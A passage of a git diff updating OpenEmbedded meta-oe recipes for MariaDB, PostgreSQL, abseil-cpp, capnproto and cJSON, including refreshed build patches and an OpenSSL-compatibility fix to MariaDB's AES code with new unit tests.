a/include/mysql/service_my_crypt.h b/include/mysql/service_my_crypt.h -index 2a232117..bb038aaa 100644 ---- a/include/mysql/service_my_crypt.h -+++ b/include/mysql/service_my_crypt.h -@@ -45,7 +45,7 @@ extern "C" { - /* The max key length of all supported algorithms */ - #define MY_AES_MAX_KEY_LENGTH 32 - --#define MY_AES_CTX_SIZE 656 -+#define MY_AES_CTX_SIZE 672 - - enum my_aes_mode { - MY_AES_ECB, MY_AES_CBC -diff --git a/include/ssl_compat.h b/include/ssl_compat.h -index 8dc12254..6db1baab 100644 ---- a/include/ssl_compat.h -+++ b/include/ssl_compat.h -@@ -24,7 +24,7 @@ - #define SSL_LIBRARY OpenSSL_version(OPENSSL_VERSION) - #define ERR_remove_state(X) ERR_clear_error() - #define EVP_CIPHER_CTX_SIZE 176 --#define EVP_MD_CTX_SIZE 48 -+#define EVP_MD_CTX_SIZE 72 - #undef EVP_MD_CTX_init - #define EVP_MD_CTX_init(X) do { memset((X), 0, EVP_MD_CTX_SIZE); EVP_MD_CTX_reset(X); } while(0) - #undef EVP_CIPHER_CTX_init -@@ -77,7 +77,6 @@ - #define DH_set0_pqg(D,P,Q,G) ((D)->p= (P), (D)->g= (G)) - #endif - --#define EVP_CIPHER_CTX_buf_noconst(ctx) ((ctx)->buf) - #define EVP_CIPHER_CTX_encrypting(ctx) ((ctx)->encrypt) - #define EVP_CIPHER_CTX_SIZE sizeof(EVP_CIPHER_CTX) - -diff --git a/mysql-test/lib/openssl.cnf b/mysql-test/lib/openssl.cnf -index b9ab37ac..7cd6f748 100644 ---- a/mysql-test/lib/openssl.cnf -+++ b/mysql-test/lib/openssl.cnf -@@ -9,4 +9,4 @@ ssl_conf = ssl_section - system_default = system_default_section - - [system_default_section] --CipherString = ALL:@SECLEVEL=1 -+CipherString = ALL:@SECLEVEL=0 -diff --git a/mysql-test/main/ssl_cipher.result b/mysql-test/main/ssl_cipher.result -index 930d384e..66d817b7 100644 ---- a/mysql-test/main/ssl_cipher.result -+++ b/mysql-test/main/ssl_cipher.result -@@ -61,8 +61,8 @@ connect ssl_con,localhost,root,,,,,SSL; - SHOW STATUS LIKE 'Ssl_cipher'; - Variable_name Value - Ssl_cipher AES128-SHA --SHOW STATUS LIKE 'Ssl_cipher_list'; --Variable_name Value --Ssl_cipher_list AES128-SHA -+SELECT VARIABLE_VALUE like '%AES128-SHA%' FROM INFORMATION_SCHEMA.SESSION_STATUS WHERE VARIABLE_NAME='Ssl_cipher_list'; -+VARIABLE_VALUE like '%AES128-SHA%' -+1 - disconnect ssl_con; - connection default; -diff --git a/mysql-test/main/ssl_cipher.test b/mysql-test/main/ssl_cipher.test -index 36549d76..d4cdcffb 100644 ---- a/mysql-test/main/ssl_cipher.test -+++ b/mysql-test/main/ssl_cipher.test -@@ -98,6 +98,6 @@ let $restart_parameters=--ssl-cipher=AES128-SHA; - source include/restart_mysqld.inc; - connect (ssl_con,localhost,root,,,,,SSL); - SHOW STATUS LIKE 'Ssl_cipher'; --SHOW STATUS LIKE 'Ssl_cipher_list'; -+SELECT VARIABLE_VALUE like '%AES128-SHA%' FROM INFORMATION_SCHEMA.SESSION_STATUS WHERE VARIABLE_NAME='Ssl_cipher_list'; - disconnect ssl_con; - connection default; -diff --git a/mysys_ssl/my_crypt.cc b/mysys_ssl/my_crypt.cc -index e512eee9..4d7ebc7b 100644 ---- a/mysys_ssl/my_crypt.cc -+++ b/mysys_ssl/my_crypt.cc -@@ -29,11 +29,7 @@ - #include <ssl_compat.h> - #include <cstdint> - --#ifdef HAVE_WOLFSSL - #define CTX_ALIGN 16 --#else --#define CTX_ALIGN 0 --#endif - - class MyCTX - { -@@ -100,8 +96,9 @@ class MyCTX_nopad : public MyCTX - { - public: - const uchar *key; -- uint klen, buf_len; -+ uint klen, source_tail_len; - uchar oiv[MY_AES_BLOCK_SIZE]; -+ uchar source_tail[MY_AES_BLOCK_SIZE]; - - MyCTX_nopad() : MyCTX() { } - ~MyCTX_nopad() { } -@@ -112,7 +109,7 @@ class MyCTX_nopad : public MyCTX - compile_time_assert(MY_AES_CTX_SIZE >= sizeof(MyCTX_nopad)); - this->key= key; - this->klen= klen; -- this->buf_len= 0; -+ this->source_tail_len= 0; - if (ivlen) - memcpy(oiv, iv, ivlen); - DBUG_ASSERT(ivlen == 0 || ivlen == sizeof(oiv)); -@@ -123,26 +120,41 @@ class MyCTX_nopad : public MyCTX - return res; - } - -+ /** Update last partial source block, stored in source_tail array. */ -+ void update_source_tail(const uchar* src, uint slen) -+ { -+ if (!slen) -+ return; -+ uint new_tail_len= (source_tail_len + slen) % MY_AES_BLOCK_SIZE; -+ if (new_tail_len) -+ { -+ if (slen + source_tail_len < MY_AES_BLOCK_SIZE) -+ { -+ memcpy(source_tail + source_tail_len, src, slen); -+ } -+ else -+ { -+ DBUG_ASSERT(slen > new_tail_len); -+ memcpy(source_tail, src + slen - new_tail_len, new_tail_len); -+ } -+ } -+ source_tail_len= new_tail_len; -+ } -+ - int update(const uchar *src, uint slen, uchar *dst, uint *dlen) - { -- buf_len+= slen; -+ update_source_tail(src, slen); - return MyCTX::update(src, slen, dst, dlen); - } - - int finish(uchar *dst, uint *dlen) - { -- buf_len %= MY_AES_BLOCK_SIZE; -- if (buf_len) -+ if (source_tail_len) - { -- uchar *buf= EVP_CIPHER_CTX_buf_noconst(ctx); - /* - Not much we can do, block ciphers cannot encrypt data that aren't - a multiple of the block length. At least not without padding. - Let's do something CTR-like for the last partial block. -- -- NOTE this assumes that there are only buf_len bytes in the buf. -- If OpenSSL will change that, we'll need to change the implementation -- of this class too. - */ - uchar mask[MY_AES_BLOCK_SIZE]; - uint mlen; -@@ -154,10 +166,10 @@ class MyCTX_nopad : public MyCTX - return rc; - DBUG_ASSERT(mlen == sizeof(mask)); - -- for (uint i=0; i < buf_len; i++) -- dst[i]= buf[i] ^ mask[i]; -+ for (uint i=0; i < source_tail_len; i++) -+ dst[i]= source_tail[i] ^ mask[i]; - } -- *dlen= buf_len; -+ *dlen= source_tail_len; - return MY_AES_OK; - } - }; -diff --git a/unittest/mysys/aes-t.c b/unittest/mysys/aes-t.c -index 34704e06..cbec2760 100644 ---- a/unittest/mysys/aes-t.c -+++ b/unittest/mysys/aes-t.c -@@ -21,27 +21,96 @@ - #include <string.h> - #include <ctype.h> - --#define DO_TEST(mode, nopad, slen, fill, dlen, hash) \ -- SKIP_BLOCK_IF(mode == 0xDEADBEAF, nopad ? 4 : 5, #mode " not supported") \ -- { \ -- memset(src, fill, src_len= slen); \ -- ok(my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_ENCRYPT, \ -- src, src_len, dst, &dst_len, \ -- key, sizeof(key), iv, sizeof(iv)) == MY_AES_OK, \ -- "encrypt " #mode " %u %s", src_len, nopad ? "nopad" : "pad"); \ -- if (!nopad) \ -- ok (dst_len == my_aes_get_size(mode, src_len), "my_aes_get_size");\ -- my_md5(md5, (char*)dst, dst_len); \ -- ok(dst_len == dlen && memcmp(md5, hash, sizeof(md5)) == 0, "md5"); \ -- ok(my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_DECRYPT, \ -- dst, dst_len, ddst, &ddst_len, \ -- key, sizeof(key), iv, sizeof(iv)) == MY_AES_OK, \ -- "decrypt " #mode " %u", dst_len); \ -- ok(ddst_len == src_len && memcmp(src, ddst, src_len) == 0, "memcmp"); \ -+ -+/** Test streaming encryption, bytewise update.*/ -+static int aes_crypt_bytewise(enum my_aes_mode mode, int flags, const unsigned char *src, -+ unsigned int slen, unsigned char *dst, unsigned int *dlen, -+ const unsigned char *key, unsigned int klen, -+ const unsigned char *iv, unsigned int ivlen) -+{ -+ /* Allocate context on odd address on stack, in order to -+ catch misalignment errors.*/ -+ void *ctx= (char *)alloca(MY_AES_CTX_SIZE+1)+1; -+ -+ int res1, res2; -+ uint d1= 0, d2; -+ uint i; -+ -+ if ((res1= my_aes_crypt_init(ctx, mode, flags, key, klen, iv, ivlen))) -+ return res1; -+ for (i= 0; i < slen; i++) -+ { -+ uint tmp_d1=0; -+ res1= my_aes_crypt_update(ctx, src+i,1, dst, &tmp_d1); -+ if (res1) -+ return res1; -+ d1+= tmp_d1; -+ dst+= tmp_d1; -+ } -+ res2= my_aes_crypt_finish(ctx, dst, &d2); -+ *dlen= d1 + d2; -+ return res1 ? res1 : res2; -+} -+ -+ -+#ifndef HAVE_EncryptAes128Ctr -+const uint MY_AES_CTR=0xDEADBEAF; -+#endif -+#ifndef HAVE_EncryptAes128Gcm -+const uint MY_AES_GCM=0xDEADBEAF; -+#endif -+ -+#define MY_AES_UNSUPPORTED(x) (x == 0xDEADBEAF) -+ -+static void do_test(uint mode, const char *mode_str, int nopad, uint slen, -+ char fill, size_t dlen, const char *hash) -+{ -+ uchar key[16]= {1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6}; -+ uchar iv[16]= {2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7}; -+ uchar src[1000], dst[1100], dst2[1100], ddst[1000]; -+ uchar md5[MY_MD5_HASH_SIZE]; -+ uint src_len, dst_len, dst_len2, ddst_len; -+ int result; -+ -+ if (MY_AES_UNSUPPORTED(mode)) -+ { -+ skip(nopad?7:6, "%s not supported", mode_str); -+ return; -+ } -+ memset(src, fill, src_len= slen); -+ result= my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_ENCRYPT, src, src_len, -+ dst, &dst_len, key, sizeof(key), iv, sizeof(iv)); -+ ok(result == MY_AES_OK, "encrypt %s %u %s", mode_str, src_len, -+ nopad ? "nopad" : "pad"); -+ -+ if (nopad) -+ { -+ result= aes_crypt_bytewise(mode, nopad | ENCRYPTION_FLAG_ENCRYPT, src, -+ src_len, dst2, &dst_len2, key, sizeof(key), -+ iv, sizeof(iv)); -+ ok(result == MY_AES_OK, "encrypt bytewise %s %u", mode_str, src_len); -+ /* Compare with non-bytewise encryption result*/ -+ ok(dst_len == dst_len2 && memcmp(dst, dst2, dst_len) == 0, -+ "memcmp bytewise %s %u", mode_str, src_len); -+ } -+ else -+ { -+ int dst_len_real= my_aes_get_size(mode, src_len); -+ ok(dst_len_real= dst_len, "my_aes_get_size"); - } -+ my_md5(md5, (char *) dst, dst_len); -+ ok(dst_len == dlen, "md5 len"); -+ ok(memcmp(md5, hash, sizeof(md5)) == 0, "md5"); -+ result= my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_DECRYPT, -+ dst, dst_len, ddst, &ddst_len, key, sizeof(key), iv, -+ sizeof(iv)); -+ -+ ok(result == MY_AES_OK, "decrypt %s %u", mode_str, dst_len); -+ ok(ddst_len == src_len && memcmp(src, ddst, src_len) == 0, "memcmp"); -+} - --#define DO_TEST_P(M,S,F,D,H) DO_TEST(M,0,S,F,D,H) --#define DO_TEST_N(M,S,F,D,H) DO_TEST(M,ENCRYPTION_FLAG_NOPAD,S,F,D,H) -+#define DO_TEST_P(M, S, F, D, H) do_test(M, #M, 0, S, F, D, H) -+#define DO_TEST_N(M, S, F, D, H) do_test(M, #M, ENCRYPTION_FLAG_NOPAD, S, F, D, H) - - /* useful macro for debugging */ - #define PRINT_MD5() \ -@@ -53,25 +122,15 @@ - printf("\"\n"); \ - } while(0); - --#ifndef HAVE_EncryptAes128Ctr --const uint MY_AES_CTR=0xDEADBEAF; --#endif --#ifndef HAVE_EncryptAes128Gcm --const uint MY_AES_GCM=0xDEADBEAF; --#endif - - int - main(int argc __attribute__((unused)),char *argv[]) - { -- uchar key[16]= {1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6}; -- uchar iv[16]= {2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7}; -- uchar src[1000], dst[1100], ddst[1000]; -- uchar md5[MY_MD5_HASH_SIZE]; -- uint src_len, dst_len, ddst_len; - - MY_INIT(argv[0]); - -- plan(87); -+ plan(122); -+ - DO_TEST_P(MY_AES_ECB, 200, '.', 208, "\xd8\x73\x8e\x3a\xbc\x66\x99\x13\x7f\x90\x23\x52\xee\x97\x6f\x9a"); - DO_TEST_P(MY_AES_ECB, 128, '?', 144, "\x19\x58\x33\x85\x4c\xaa\x7f\x06\xd1\xb2\xec\xd7\xb7\x6a\xa9\x5b"); - DO_TEST_P(MY_AES_CBC, 159, '%', 160, "\x4b\x03\x18\x3d\xf1\xa7\xcd\xa1\x46\xb3\xc6\x8a\x92\xc0\x0f\xc9"); --- -2.25.1 - diff --git a/meta-oe/recipes-dbs/mysql/mariadb_10.7.4.bb b/meta-oe/recipes-dbs/mysql/mariadb_10.7.8.bb index c800c4c56c..87faabfa27 100644 --- a/meta-oe/recipes-dbs/mysql/mariadb_10.7.4.bb +++ b/meta-oe/recipes-dbs/mysql/mariadb_10.7.8.bb @@ -1,9 +1,7 @@ require mariadb.inc -inherit qemu - -DEPENDS += "qemu-native bison-native boost libpcre2 curl ncurses \ - zlib libaio libedit libevent libxml2 gnutls fmt lzo" +DEPENDS += "mariadb-native bison-native boost libpcre2 curl ncurses \ + zlib libaio libedit libevent libxml2 gnutls fmt lzo zstd" PROVIDES += "mysql5 libmysqlclient" diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch b/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch index 90b7419495..46343674fc 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch @@ -1,16 +1,17 @@ -From 780fd27ea6f7f2c446c46a7a5e26d94106c67efd Mon Sep 17 00:00:00 2001 +From 0801befde991250b4502954fdec61bec8c33da3b Mon Sep 17 00:00:00 2001 From: "Richard W.M. Jones" <rjones@redhat.com> Date: Sun, 20 Nov 2016 15:04:52 +0000 Subject: [PATCH] Add support for RISC-V. The architecture is sufficiently similar to aarch64 that simply extending the existing aarch64 macro works. + --- src/include/storage/s_lock.h | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/src/include/storage/s_lock.h b/src/include/storage/s_lock.h -index dccbd29..ad60429 100644 +index 95049f0..e08c963 100644 --- a/src/include/storage/s_lock.h +++ b/src/include/storage/s_lock.h @@ -317,11 +317,12 @@ tas(volatile slock_t *lock) @@ -35,7 +36,4 @@ index dccbd29..ad60429 100644 +#endif /* __arm__ || __arm || __aarch64__ || __aarch64 || __riscv */ - /* --- -2.34.1 - + /* S/390 and S/390x Linux (32- and 64-bit zSeries) */ diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch b/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch index 02f4c9e513..eeffe6bcb1 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch @@ -1,4 +1,4 @@ -From bbba8a5261a99e79c9cd4693ef56021014a9856b Mon Sep 17 00:00:00 2001 +From e167d58d6be1b1ee4d49571650444700ab97ed7c Mon Sep 17 00:00:00 2001 From: Changqing Li <changqing.li@windriver.com> Date: Mon, 28 Dec 2020 16:38:21 +0800 Subject: [PATCH] Improve reproducibility, @@ -18,6 +18,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> update patch for v13.1 Signed-off-by: Changqing Li <changqing.li@windriver.com> + --- src/common/Makefile | 3 --- 1 file changed, 3 deletions(-) @@ -36,6 +37,3 @@ index 880722f..7a9b9d4 100644 override CPPFLAGS += -DVAL_CFLAGS_SL="\"$(CFLAGS_SL)\"" override CPPFLAGS += -DVAL_LDFLAGS="\"$(STD_LDFLAGS)\"" override CPPFLAGS += -DVAL_LDFLAGS_EX="\"$(LDFLAGS_EX)\"" --- -2.34.1 - diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch b/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch index 52ca276da6..eff69140f7 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch @@ -1,4 +1,4 @@ -From b92eebe8b0760fee7bd55c6c22318620c2c07579 Mon Sep 17 00:00:00 2001 +From 805f03529c7fc33685979651562112bab524e5a5 Mon Sep 17 00:00:00 2001 From: Mingli Yu <mingli.yu@windriver.com> Date: Mon, 1 Aug 2022 15:44:38 +0800 Subject: [PATCH] config_info.c: not expose build info @@ -8,13 +8,14 @@ Don't collect the build information to fix the buildpaths issue. Upstream-Status: Inappropriate [oe specific] Signed-off-by: Mingli Yu <mingli.yu@windriver.com> + --- configure.ac | 2 +- - src/common/config_info.c | 68 ---------------------------------------- - 2 files changed, 1 insertion(+), 69 deletions(-) + src/common/config_info.c | 70 +--------------------------------------- + 2 files changed, 2 insertions(+), 70 deletions(-) diff --git a/configure.ac b/configure.ac -index 0eb595b..508487b 100644 +index 54a539e..c6edc0a 100644 --- a/configure.ac +++ b/configure.ac @@ -23,7 +23,7 @@ AC_COPYRIGHT([Copyright (c) 1996-2021, PostgreSQL Global Development Group]) @@ -27,10 +28,10 @@ index 0eb595b..508487b 100644 [PG_MAJORVERSION=`expr "$PACKAGE_VERSION" : '\([0-9][0-9]*\)'`] [PG_MINORVERSION=`expr "$PACKAGE_VERSION" : '.*\.\([0-9][0-9]*\)'`] diff --git a/src/common/config_info.c b/src/common/config_info.c -index e72e729..b482c20 100644 +index e72e729..a020236 100644 --- a/src/common/config_info.c +++ b/src/common/config_info.c -@@ -38,7 +38,7 @@ +@@ -38,7 +38,7 @@ get_configdata(const char *my_exec_path, size_t *configdata_len) int i = 0; /* Adjust this to match the number of items filled below */ @@ -39,7 +40,7 @@ index e72e729..b482c20 100644 configdata = (ConfigData *) palloc(*configdata_len * sizeof(ConfigData)); configdata[i].name = pstrdup("BINDIR"); -@@ -123,74 +123,6 @@ +@@ -123,74 +123,6 @@ get_configdata(const char *my_exec_path, size_t *configdata_len) configdata[i].setting = pstrdup(path); i++; @@ -114,6 +115,3 @@ index e72e729..b482c20 100644 configdata[i].name = pstrdup("VERSION"); configdata[i].setting = pstrdup("PostgreSQL " PG_VERSION); i++; --- -2.25.1 - diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch b/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch index 4a576d7172..807eac219b 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch @@ -1,4 +1,4 @@ -From 258c6bd2ad96f2c42f1cb5f4c84e4ca5865059f0 Mon Sep 17 00:00:00 2001 +From c48f2f132744a0b4a2473ec178d63c1d4d1a4a86 Mon Sep 17 00:00:00 2001 From: Yi Fan Yu <yifan.yu@windriver.com> Date: Fri, 5 Feb 2021 17:15:42 -0500 Subject: [PATCH] configure.ac: bypass autoconf 2.69 version check @@ -14,12 +14,12 @@ Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com> 1 file changed, 4 deletions(-) diff --git a/configure.ac b/configure.ac -index ffe878e..c39799b 100644 +index e59dc99..41b4732 100644 --- a/configure.ac +++ b/configure.ac @@ -19,10 +19,6 @@ m4_pattern_forbid(^PGAC_)dnl to catch undefined macros - AC_INIT([PostgreSQL], [14.5], [pgsql-bugs@lists.postgresql.org], [], [https://www.postgresql.org/]) + AC_INIT([PostgreSQL], [14.11], [pgsql-bugs@lists.postgresql.org], [], [https://www.postgresql.org/]) -m4_if(m4_defn([m4_PACKAGE_VERSION]), [2.69], [], [m4_fatal([Autoconf version 2.69 is required. -Untested combinations of 'autoconf' and PostgreSQL versions are not diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-postgresql-fix-ptest-failure-of-sysviews.patch b/meta-oe/recipes-dbs/postgresql/files/0001-postgresql-fix-ptest-failure-of-sysviews.patch new file mode 100644 index 0000000000..555fd7f1fc --- /dev/null +++ b/meta-oe/recipes-dbs/postgresql/files/0001-postgresql-fix-ptest-failure-of-sysviews.patch @@ -0,0 +1,47 @@ +From 5a17b7b88776cbbe5b37838baff71726b8a6e7dd Mon Sep 17 00:00:00 2001 +From: Manoj Saun <manojsingh.saun@windriver.com> +Date: Wed, 22 Mar 2023 08:07:26 +0000 +Subject: [PATCH] postgresql: fix ptest failure of sysviews + +The patch "0001-config_info.c-not-expose-build-info.patch" hides the debug info +in pg_config table which reduces the count of rows from pg_config and leads to +sysviews test failure. +To fix it we need to reduce the count of parameters in sysviews test. +Also we need to reduce the row count in expected result of sysview test +to make the test output shown as pass. + +Upstream-Status: Inappropriate [oe specific] + +Signed-off-by: Manoj Saun <manojsingh.saun@windriver.com> + +--- + src/test/regress/expected/sysviews.out | 2 +- + src/test/regress/sql/sysviews.sql | 2 +- + 2 files changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/test/regress/expected/sysviews.out b/src/test/regress/expected/sysviews.out +index 2088857..96a15cc 100644 +--- a/src/test/regress/expected/sysviews.out ++++ b/src/test/regress/expected/sysviews.out +@@ -29,7 +29,7 @@ select name, ident, parent, level, total_bytes >= free_bytes + (1 row) + + -- At introduction, pg_config had 23 entries; it may grow +-select count(*) > 20 as ok from pg_config; ++select count(*) > 13 as ok from pg_config; + ok + ---- + t +diff --git a/src/test/regress/sql/sysviews.sql b/src/test/regress/sql/sysviews.sql +index b24816e..72ff887 100644 +--- a/src/test/regress/sql/sysviews.sql ++++ b/src/test/regress/sql/sysviews.sql +@@ -18,7 +18,7 @@ select name, ident, parent, level, total_bytes >= free_bytes + from pg_backend_memory_contexts where level = 0; + + -- At introduction, pg_config had 23 entries; it may grow +-select count(*) > 20 as ok from pg_config; ++select count(*) > 13 as ok from pg_config; + + -- We expect no cursors in this test; see also portals.sql + select count(*) = 0 as ok from pg_cursors; diff --git a/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch b/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch index fa46912eef..b742bd53bd 100644 --- a/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch +++ b/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch @@ -1,4 +1,4 @@ -From 56b830edecff1cac5f8a8a956e7a7eeef2aa7c17 Mon Sep 17 00:00:00 2001 +From 09fad1883f3312965a8d066f8477166eaa4db2c7 Mon Sep 17 00:00:00 2001 From: Changqing Li <changqing.li@windriver.com> Date: Tue, 27 Nov 2018 13:25:15 +0800 Subject: [PATCH] not check libperl under cross compiling @@ -15,15 +15,16 @@ Signed-off-by: Roy Li <rongqing.li@windriver.com> update patch to version 11.1 Signed-off-by: Changqing Li <changqing.li@windriver.com> + --- configure.ac | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac -index fba79ee..7170f26 100644 +index 159f2a2..d0f0b14 100644 --- a/configure.ac +++ b/configure.ac -@@ -2261,7 +2261,7 @@ Use --without-tcl to disable building PL/Tcl.]) +@@ -2332,7 +2332,7 @@ Use --without-tcl to disable building PL/Tcl.]) fi # check for <perl.h> @@ -32,6 +33,3 @@ index fba79ee..7170f26 100644 ac_save_CPPFLAGS=$CPPFLAGS CPPFLAGS="$CPPFLAGS $perl_includespec" AC_CHECK_HEADER(perl.h, [], [AC_MSG_ERROR([header file <perl.h> is required for Perl])], --- -2.34.1 - diff --git a/meta-oe/recipes-dbs/postgresql/files/remove_duplicate.patch b/meta-oe/recipes-dbs/postgresql/files/remove_duplicate.patch deleted file mode 100644 index 92a3dcc710..0000000000 --- a/meta-oe/recipes-dbs/postgresql/files/remove_duplicate.patch +++ /dev/null @@ -1,38 +0,0 @@ -Remove duplicate code for riscv - -Upstream-Status: Pending -Signed-off-by: Khem Raj <raj.khem@gmail.com> - ---- a/src/include/storage/s_lock.h -+++ b/src/include/storage/s_lock.h -@@ -341,30 +341,6 @@ tas(volatile slock_t *lock) - #endif /* HAVE_GCC__SYNC_INT32_TAS */ - #endif /* __arm__ || __arm || __aarch64__ || __aarch64 || __riscv */ - -- --/* -- * RISC-V likewise uses __sync_lock_test_and_set(int *, int) if available. -- */ --#if defined(__riscv) --#ifdef HAVE_GCC__SYNC_INT32_TAS --#define HAS_TEST_AND_SET -- --#define TAS(lock) tas(lock) -- --typedef int slock_t; -- --static __inline__ int --tas(volatile slock_t *lock) --{ -- return __sync_lock_test_and_set(lock, 1); --} -- --#define S_UNLOCK(lock) __sync_lock_release(lock) -- --#endif /* HAVE_GCC__SYNC_INT32_TAS */ --#endif /* __riscv */ -- -- - /* S/390 and S/390x Linux (32- and 64-bit zSeries) */ - #if defined(__s390__) || defined(__s390x__) - #define HAS_TEST_AND_SET diff --git a/meta-oe/recipes-dbs/postgresql/postgresql_14.5.bb b/meta-oe/recipes-dbs/postgresql/postgresql_14.11.bb index 1551d34053..8a8c3b9f1e 100644 --- a/meta-oe/recipes-dbs/postgresql/postgresql_14.5.bb +++ b/meta-oe/recipes-dbs/postgresql/postgresql_14.11.bb @@ -1,17 +1,17 @@ require postgresql.inc -LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=75af6e3eeec4a06cdd2e578673236fc3" +LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89afbb2d7716371015101c2b2cb4297a" SRC_URI += "\ file://not-check-libperl.patch \ file://0001-Add-support-for-RISC-V.patch \ file://0001-Improve-reproducibility.patch \ file://0001-configure.ac-bypass-autoconf-2.69-version-check.patch \ - file://remove_duplicate.patch \ file://0001-config_info.c-not-expose-build-info.patch \ + file://0001-postgresql-fix-ptest-failure-of-sysviews.patch \ " -SRC_URI[sha256sum] = "d4f72cb5fb857c9a9f75ec8cf091a1771272802f2178f0b2e65b7b6ff64f4a30" +SRC_URI[sha256sum] = "a670bd7dce22dcad4297b261136b3b1d4a09a6f541719562aa14ca63bf2968a8" CVE_CHECK_IGNORE += "\ CVE-2017-8806 \ diff --git a/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp/0001-absl-strings-internal-str_format-extension.h-add-mis.patch b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp/0001-absl-strings-internal-str_format-extension.h-add-mis.patch new file mode 100644 index 0000000000..88f3816b0f --- /dev/null +++ b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp/0001-absl-strings-internal-str_format-extension.h-add-mis.patch @@ -0,0 +1,31 @@ +From b436bc4ef31e29d73363d60b84e77eb419f46c50 Mon Sep 17 00:00:00 2001 +From: Sergei Trofimovich <slyich@gmail.com> +Date: Fri, 27 May 2022 22:27:58 +0100 +Subject: [PATCH] absl/strings/internal/str_format/extension.h: add missing + <stdint.h> include + +Without the change absl-cpp build fails on this week's gcc-13 snapshot as: + + /build/abseil-cpp/absl/strings/internal/str_format/extension.h:34:33: error: found ':' in nested-name-specifier, expected '::' + 34 | enum class FormatConversionChar : uint8_t; + | ^ + | :: + +Upstream-Status: Backport [20220623.0 36a4b073f1e7e02ed7d1ac140767e36f82f09b7c] +Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com> +--- + absl/strings/internal/str_format/extension.h | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/absl/strings/internal/str_format/extension.h b/absl/strings/internal/str_format/extension.h +index c47536d6..08c3fbeb 100644 +--- a/absl/strings/internal/str_format/extension.h ++++ b/absl/strings/internal/str_format/extension.h +@@ -17,6 +17,7 @@ + #define ABSL_STRINGS_INTERNAL_STR_FORMAT_EXTENSION_H_ + + #include <limits.h> ++#include <stdint.h> + + #include <cstddef> + #include <cstring> diff --git a/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb index 1bb27d4369..30eef75ffb 100644 --- a/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb +++ b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb @@ -14,6 +14,7 @@ SRC_URI = "git://github.com/abseil/abseil-cpp;branch=${BRANCH};protocol=https \ file://0001-absl-always-use-asm-sgidefs.h.patch \ file://0002-Remove-maes-option-from-cross-compilation.patch \ file://abseil-ppc-fixes.patch \ + file://0001-absl-strings-internal-str_format-extension.h-add-mis.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/capnproto/capnproto_0.9.1.bb b/meta-oe/recipes-devtools/capnproto/capnproto_0.9.2.bb index d14bd843ef..d114ad0c63 100644 --- a/meta-oe/recipes-devtools/capnproto/capnproto_0.9.1.bb +++ b/meta-oe/recipes-devtools/capnproto/capnproto_0.9.2.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://../LICENSE;md5=a05663ae6cca874123bf667a60dca8c9" SRC_URI = "git://github.com/sandstorm-io/capnproto.git;branch=release-${PV};protocol=https \ " -SRCREV = "b49431c48d40490ef979247d308af63345376cee" +SRCREV = "0274bf17374df912ea834687c667bed33bd318db" S = "${WORKDIR}/git/c++" diff --git a/meta-oe/recipes-devtools/cjson/cjson_1.7.15.bb b/meta-oe/recipes-devtools/cjson/cjson_1.7.17.bb index 200f751669..c9c38a9fe3 100644 --- a/meta-oe/recipes-devtools/cjson/cjson_1.7.15.bb +++ b/meta-oe/recipes-devtools/cjson/cjson_1.7.17.bb @@ -6,7 +6,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=218947f77e8cb8e2fa02918dc41c50d0" SRC_URI = "git://github.com/DaveGamble/cJSON.git;branch=master;protocol=https" -SRCREV = "d348621ca93571343a56862df7de4ff3bc9b5667" +SRCREV = 